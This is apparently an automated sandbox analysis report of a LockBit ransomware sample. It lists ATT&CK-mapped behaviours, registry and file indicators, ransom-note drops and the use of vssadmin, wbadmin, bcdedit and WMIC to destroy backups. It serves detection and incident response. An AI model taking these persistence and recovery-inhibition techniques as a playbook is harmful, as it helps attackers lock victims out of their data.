lockbit | b7147a76c6695b750a84de55d4569f71f694b33aeefeef5daa09318ebabd9a24

pid	Process
2200	bcdedit.exe
4596	bcdedit.exe

Renames multiple (6396) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
4972	wbadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe\""	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\B333.tmp.bmp"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-150_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-150.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-256_altform-unplated.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\AppxManifest.xml	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-40_altform-lightunplated.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-ppd.xrm-ms	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_~_kzf8qxf38zg5c\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-96_altform-unplated_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-GoogleCloudCacheMini.scale-100.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_LogoSmall.targetsize-32.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-unplated_contrast-white.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-256_altform-unplated_contrast-white.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Programmer.targetsize-32_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiItalic.ttf	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\FileAssociation\FileAssociation.targetsize-24.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_contrast-white.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MediumTile.scale-125_contrast-white.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-150_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-100_contrast-black.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-60_altform-lightunplated.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\gl\msipc.dll.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\EmptyReport.rdlc	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\OnlineMediaComponent.winmd	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated_contrast-white.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-fullcolor.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-16.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-32.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\ui-strings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\review_poster.jpg	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-ms	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\8.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\WideTile.scale-200.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxSelected.svg	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ul-oob.xrm-ms	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-pl.xrm-ms	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-125.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
3552	vssadmin.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\WallpaperStyle = "2"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\TileWallpaper = "0"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5736	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Token: SeDebugPrivilege	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Token: SeBackupPrivilege	4300	vssvc.exe
Token: SeRestorePrivilege	4300	vssvc.exe
Token: SeAuditPrivilege	4300	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3568	WMIC.exe
Token: SeSecurityPrivilege	3568	WMIC.exe
Token: SeTakeOwnershipPrivilege	3568	WMIC.exe
Token: SeLoadDriverPrivilege	3568	WMIC.exe
Token: SeSystemProfilePrivilege	3568	WMIC.exe
Token: SeSystemtimePrivilege	3568	WMIC.exe
Token: SeProfSingleProcessPrivilege	3568	WMIC.exe
Token: SeIncBasePriorityPrivilege	3568	WMIC.exe
Token: SeCreatePagefilePrivilege	3568	WMIC.exe
Token: SeBackupPrivilege	3568	WMIC.exe
Token: SeRestorePrivilege	3568	WMIC.exe
Token: SeShutdownPrivilege	3568	WMIC.exe
Token: SeDebugPrivilege	3568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3568	WMIC.exe
Token: SeRemoteShutdownPrivilege	3568	WMIC.exe
Token: SeUndockPrivilege	3568	WMIC.exe
Token: SeManageVolumePrivilege	3568	WMIC.exe
Token: 33	3568	WMIC.exe
Token: 34	3568	WMIC.exe
Token: 35	3568	WMIC.exe
Token: 36	3568	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3568	WMIC.exe
Token: SeSecurityPrivilege	3568	WMIC.exe
Token: SeTakeOwnershipPrivilege	3568	WMIC.exe
Token: SeLoadDriverPrivilege	3568	WMIC.exe
Token: SeSystemProfilePrivilege	3568	WMIC.exe
Token: SeSystemtimePrivilege	3568	WMIC.exe
Token: SeProfSingleProcessPrivilege	3568	WMIC.exe
Token: SeIncBasePriorityPrivilege	3568	WMIC.exe
Token: SeCreatePagefilePrivilege	3568	WMIC.exe
Token: SeBackupPrivilege	3568	WMIC.exe
Token: SeRestorePrivilege	3568	WMIC.exe
Token: SeShutdownPrivilege	3568	WMIC.exe
Token: SeDebugPrivilege	3568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3568	WMIC.exe
Token: SeRemoteShutdownPrivilege	3568	WMIC.exe
Token: SeUndockPrivilege	3568	WMIC.exe
Token: SeManageVolumePrivilege	3568	WMIC.exe
Token: 33	3568	WMIC.exe
Token: 34	3568	WMIC.exe
Token: 35	3568	WMIC.exe
Token: 36	3568	WMIC.exe
Token: SeBackupPrivilege	1524	wbengine.exe
Token: SeRestorePrivilege	1524	wbengine.exe
Token: SeSecurityPrivilege	1524	wbengine.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1768 wrote to memory of 2664	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	92
PID 1768 wrote to memory of 2664	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	92
PID 2664 wrote to memory of 3552	2664	cmd.exe	94
PID 2664 wrote to memory of 3552	2664	cmd.exe	94
PID 2664 wrote to memory of 3568	2664	cmd.exe	98
PID 2664 wrote to memory of 3568	2664	cmd.exe	98
PID 2664 wrote to memory of 2200	2664	cmd.exe	100
PID 2664 wrote to memory of 2200	2664	cmd.exe	100
PID 2664 wrote to memory of 4596	2664	cmd.exe	101
PID 2664 wrote to memory of 4596	2664	cmd.exe	101
PID 2664 wrote to memory of 4972	2664	cmd.exe	102
PID 2664 wrote to memory of 4972	2664	cmd.exe	102
PID 1768 wrote to memory of 5636	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	114
PID 1768 wrote to memory of 5636	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	114
PID 1768 wrote to memory of 5636	1768	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	114
PID 5636 wrote to memory of 5736	5636	cmd.exe	116
PID 5636 wrote to memory of 5736	5636	cmd.exe	116
PID 5636 wrote to memory of 5736	5636	cmd.exe	116
PID 5636 wrote to memory of 4716	5636	cmd.exe	118
PID 5636 wrote to memory of 4716	5636	cmd.exe	118
PID 5636 wrote to memory of 4716	5636	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

